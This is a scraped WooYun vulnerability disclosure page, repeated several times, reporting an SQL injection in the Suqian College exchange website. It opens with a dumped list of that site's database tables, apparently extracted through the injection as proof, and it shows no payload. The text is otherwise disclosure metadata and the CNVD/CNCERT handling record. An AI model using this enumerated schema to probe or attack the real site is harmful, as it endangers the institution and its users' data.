| [Table]admincustom      |
| [Table]admingroups      |
| [Table]adminnotes       |
| [Table]adminsessions    |
| [Table]ads              |
| [Table]advertisements   |
| [Table]announcements    |
| [Table]attachmentfields |
| [Table]attachments      |
| [Table]attachmenttypes  |
| [Table]attachpaymentlog |
| [Table]attachtypes      |
| [Table]banned           |
| [Table]bbcodes          |
| [Table]blocks           |
| [Table]cache_0          |
| [Table]cache_1          |
| [Table]cache_2          |
| [Table]cache_3          |
| [Table]cache_4          |
| [Table]cache_5          |
| [Table]cache_6          |
| [Table]cache_7          |
| [Table]cache_8          |
| [Table]cache_9          |
| [Table]cache_a          |
| [Table]cache_b          |
| [Table]cache_c          |
| [Table]cache_d          |
| [Table]cache_e          |
| [Table]cache_f          |
| [Table]cache            |
| [Table]caches           |
| [Table]categories       |
| [Table]channels         |
| [Table]corpus           |
| [Table]creditslog       |
| [Table]crons            |
| [Table]customfields     |
| [Table]debateposts      |
| [Table]debates          |
| [Table]effects          |
| [Table]failedlogins     |
| [Table]faqs             |
| [Table]favoriteforums   |
| [Table]favorites        |
| [Table]favoritethreads  |
| [Table]feeds            |
| [Table]forumfields      |
| [Table]forumlinks       |
| [Table]forumrecommend   |
| [Table]forums           |
| [Table]friendlinks      |
| [Table]friends          |
| [Table]goodsprice       |
| [Table]groupfields      |
| [Table]groupinvite      |
| [Table]groupitems       |
| [Table]groups           |
| [Table]groupuid         |
| [Table]guestbooks       |
| [Table]imagetypes       |
| [Table]invites          |
| [Table]itempool         |
| [Table]itemtypes        |
| [Table]magiclog         |
| [Table]magicmarket      |
| [Table]magics           |
| [Table]medallog         |
| [Table]medals           |
| [Table]memberfields     |
| [Table]membermagics     |
| [Table]memberrecommend  |
| [Table]members          |
| [Table]memberspaces     |
| [Table]modelcolumns     |
| [Table]modelinterval    |
| [Table]modelperm        |
| [Table]models           |
| [Table]moderators       |
| [Table]modworks         |
| [Table]myposts          |
| [Table]mytasks          |
| [Table]mythreads        |
| [Table]navs             |
| [Table]onlinelist       |
| [Table]onlinetime       |
| [Table]orders           |
| [Table]paymentlog       |
| [Table]pluginhooks      |
| [Table]plugins          |
| [Table]pluginvars       |
| [Table]polloptions      |
| [Table]polls            |
| [Table]postposition     |
| [Table]posts            |
| [Table]prefields        |
| [Table]profilefields    |
| [Table]projects         |
| [Table]promotions       |
| [Table]prompt           |
| [Table]promptmsgs       |
| [Table]prompttype       |
| [Table]ranks            |
| [Table]ratelog          |
| [Table]regips           |
| [Table]relatedthreads   |
| [Table]reportlog        |
| [Table]reports          |
| [Table]request          |
| [Table]rewardlog        |
| [Table]robotitems       |
| [Table]robotlog         |
| [Table]robotmessages    |
| [Table]robots           |
| [Table]rss              |
| [Table]rsscaches        |
| [Table]searchindex      |
| [Table]sessions         |
| [Table]settings         |
| [Table]sitemaplogs      |
| [Table]smilies          |
| [Table]spaceblogs       |
| [Table]spacecache10     |
| [Table]spacecache2      |
| [Table]spacecache3      |
| [Table]spacecache4      |
| [Table]spacecache5      |
| [Table]spacecache6      |
| [Table]spacecache7      |
| [Table]spacecache8      |
| [Table]spacecache9      |
| [Table]spacecache       |
| [Table]spacecaches      |
| [Table]spacecomments    |
| [Table]spacefiles       |
| [Table]spacegoods       |
| [Table]spaceimages      |
| [Table]spaceitems       |
| [Table]spacelinks       |
| [Table]spacenews        |
| [Table]spacetags        |
| [Table]spacevideos      |
| [Table]stats            |
| [Table]statvars         |
| [Table]styles           |
| [Table]stylevars        |
| [Table]tagcache_0       |
| [Table]tagcache_1       |
| [Table]tagcache_2       |
| [Table]tagcache_3       |
| [Table]tagcache_4       |
| [Table]tagcache_5       |
| [Table]tagcache_6       |
| [Table]tagcache_7       |
| [Table]tagcache_8       |
| [Table]tagcache_9       |
| [Table]tagcache_a       |
| [Table]tagcache_b       |
| [Table]tagcache_c       |
| [Table]tagcache_d       |
| [Table]tagcache_e       |
| [Table]tagcache_f       |
| [Table]tagcache         |
| [Table]tags             |
| [Table]tasks            |
| [Table]taskvars         |
| [Table]templates        |
| [Table]threads          |
| [Table]threadsmod       |
| [Table]threadtags       |
| [Table]threadtypes      |
| [Table]topicelements    |
| [Table]topics           |
| [Table]tracks           |
| [Table]tradecomments    |
| [Table]tradelog         |
| [Table]tradeoptionvars  |
| [Table]trades           |
| [Table]typemodels       |
| [Table]typeoptions      |
| [Table]typeoptionvars   |
| [Table]typevars         |
| [Table]usercss          |
| [Table]userfields       |
| [Table]usergroups       |
| [Table]userlinks        |
| [Table]userprofile      |
| [Table]userspacefields  |
| [Table]userspaces       |
| [Table]validating       |
| [Table]visitors         |
| [Table]warnings         |
| [Table]words            |
+-------------------------+

修复方案：

更新

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：10

确认时间：2015-08-13 15:28

厂商回复：

CNVD确认所述情况，已经转由CNCERT下发给江苏分中心，由其后续协调网站管理单位处置。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133131

漏洞标题：宿迁学院交流网SQL注入

相关厂商：宿迁学院

漏洞作者：路人甲

提交时间：2015-08-12 17:22

修复时间：2015-09-27 15:30

公开时间：2015-09-27 15:30

漏洞类型：SQL注射漏洞

危害等级：低

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0133131

漏洞标题：宿迁学院交流网SQL注入

相关厂商：宿迁学院

漏洞作者： 路人甲

提交时间：2015-08-12 17:22

修复时间：2015-09-27 15:30

公开时间：2015-09-27 15:30

漏洞类型：SQL注射漏洞

危害等级：低

自评Rank：5

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0133131"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云